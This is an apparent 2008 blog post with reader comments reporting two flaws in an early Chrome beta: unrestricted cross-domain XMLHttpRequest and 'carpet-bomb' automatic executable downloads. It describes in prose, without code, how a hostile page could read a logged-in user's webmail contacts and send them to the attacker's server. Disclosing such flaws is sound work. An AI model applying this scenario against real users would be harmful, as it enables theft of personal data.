Google recently launched its own browser called chrome. Browser looks good assuming that its a first beta release. But they have missed out on some of critical security vulnerabilities. The two security vulnerabilities which I found in chrome with examples are given below:
- Cross Domain XMLHTTP Request Calls
- Carpet-Bomb attack
The XMLHttp Request object is at the core of today's most exciting AJAX web applications. But actually writing client web applications that use this object can be tricky given restrictions imposed by web browsers . Web browsers don't allow us to make the xmlhttprequests across the domains, i.e, a web page on yahoo.com domain cant make xmlhttp request to google.com. This restriction is there to ensure the security. But chrome browser doesn't seems to adhere to this security standard. Chrome is freely allowing us to make cross-domain calls. So how can this vulnerability be exploited, say you are logged-in to your gmail account and now say you reach one of web page created by me. On the web page I send a XMLhttprequest to http://gmail.com/contacts (assume that url gets us the contact list), I can post all these contacts to one of my server. This is just one example on how to exploit this vulnerability there can be many other things an exploiter can do including cookie theft.
Here is an example which loads the Address book of rediff if user is logged in to rediff account. Try this link in chrome, if you are logged in into rediffmail, clicking on load will actually load content of your rediffmail address book. This will not work on firefox and IE.
Carpet Bomb Attack:
Traditional browsers like firefox and IE prompt users before downloading any malicious files. But chrome doest want to bother its users by prompting them whether they want to download the files. Carpet bomb vulnerability earlier existed in Safari. Here is an example of how opening an URL can download .exe file on to your desktop. Try opening this link using chrome browser, It will download a sample .exe file in the default download location.
Microsoft was always on receiving end for building insecure products. Google seems to be no different when it comes to core products. Hope Google will fix these vulnerabilities soon and release next version of chrome.
Also Read: Google Fixes Security Issues in chrome and Updates Silently
Firefox Rocks!
ReplyDeleteI am very happy that there are bugs in chrome :).
Even google has the knack of inducing the reality distortion field like Apple when it comes to launching their products. :)
ReplyDeleteye..chrome does crash a lot too...guess that's why google has tried to isolate crashes of tabs by starting a new process for each tab :P
ReplyDeleteChrome is far from perfect..but this is just the beginning. An interesting statistic would be the number of people who have switched their default browser to chrome in the last week. Scary news for MS/FF.
I don't get how Cross Domain XMLHTTP Request is a security vulnerability.
ReplyDeleteFF3 allows it:
http://developer.mozilla.org/en/Cross-Site_XMLHttpRequest
or are you saying that Chrome allows it blindly (means W3C Access Control standard is not followed) ?
PS: Haven't tried chrome yet.
Seems I need to update myself:
ReplyDeletehttp://robert.accettura.com/blog/2008/03/26/cross-site-xmlhttprequest-xhr-removed-from-firefox-3/
It's removed from FF3. But I still don't see if it's w3C standard, then how come it would be considered a bug.
Hey Praveen,
ReplyDeleteFF3 is talking about controlled cross site requests as in say if a site mallik.com want to give access to files on codeinspections.com then owner of codeinspections.com needs to send Access-Control: allow mallik.com as part of http response. So basically owner has control of which sites to allow. But bug in chrome is it freely allows everyone to make cross site xmlhttprequests
You sure about the Cross domain XMLHttp?? Tried out your link in chrome and got a permission denied in line 42 as expected. Too glaring a bug to be released with.. :)
ReplyDeleteGoogle fixed cross-domain XML httprequests. Read Here
ReplyDelete